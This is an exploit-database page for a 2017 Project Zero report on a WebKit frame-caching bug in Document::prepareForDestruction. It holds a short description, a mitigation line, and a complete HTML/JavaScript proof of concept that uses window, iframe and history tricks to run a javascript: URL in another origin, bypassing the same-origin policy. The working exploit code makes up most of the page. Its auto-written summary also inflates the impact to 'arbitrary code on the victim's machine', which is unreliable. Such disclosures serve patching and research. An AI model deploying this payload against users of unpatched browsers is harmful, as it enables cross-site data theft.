header-logo
Suggest Exploit
vendor:
N/A
by:
Project Zero
8,8
CVSS
HIGH
Frame Caching Vulnerability
843
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2017

Document::prepareForDestruction Frame Caching Vulnerability

Document::prepareForDestruction is called on the assumption that the document will not be used again with its frame. However, if a frame caching is made in Document::prepareForDestruction, the document's frame will be stored in a CachedFrame object that will reattach the frame at some point, and thereafter, the document's frame will be never detached due to |m_hasPreparedForDestruction|. The PoC code creates a new window and an iframe in it. The iframe is then navigated to about:blank and a click event is triggered on an anchor element. This triggers the onunload event of the iframe, which is used to set the location of the window to a javascript URI. This causes the window to execute the javascript code, which sets the location of the window to a malicious website. This exploit can be used to bypass the same-origin policy and execute arbitrary code on the victim's machine.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the Document::prepareForDestruction function is not called until the frame is completely detached from the document.
Source

Exploit-DB raw data:

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1163

Here's a snippet of Document::prepareForDestruction

void Document::prepareForDestruction()
{
    if (m_hasPreparedForDestruction)
        return;
    ...
    detachFromFrame();

    m_hasPreparedForDestruction = true;
}

Document::prepareForDestruction is called on the assumption that the document will not be used again with its frame. However, if a frame caching is made in Document::prepareForDestruction, the document's frame will be stored in a CachedFrame object that will reattach the frame at some point, and thereafter, the document's frame will be never detached due to |m_hasPreparedForDestruction|.


PoC:
-->

<body>
Click anywhere.
<script>
function createURL(data, type = 'text/html') {
    return URL.createObjectURL(new Blob([data], {type: type}));
}

function waitFor(check, cb) {
    let it = setInterval(() => {
        if (check()) {
            clearInterval(it);
            cb();
        }
    }, 10);
}

window.onclick = () => {
    window.onclick = null;

    w = open(createURL(''), '', 'width=500, height=500');
    w.onload = () => {
        setTimeout(() => {
            let f = w.document.body.appendChild(document.createElement('iframe'));
            f.contentWindow.onunload = () => {
                f.contentWindow.onunload = null;

                w.__defineGetter__('navigator', () => new Object());

                let a = w.document.createElement('a');
                a.href = 'about:blank';
                a.click();

                setTimeout(() => {
                    w.history.back();
                    setTimeout(() => {
                        let d = w.document;
                        w.location = 'javascript:' + encodeURI(`"<script>location = 'https://abc.xyz/';</scrip` + `t>"`);

                        let it = setInterval(() => {
                            try {
                                w.xxxx;
                            } catch (e) {
                                clearInterval(it);

                                let a = d.createElement('a');
                                a.href = 'javascript:alert(location);';
                                a.click();
                            }
                        }, 10);
                    }, 100);
                }, 100);
            };

            w.location = 'javascript:""';
        }, 0);
    };

}

</script>
</body>

Navigation

Suggest Exploit

Services By CQR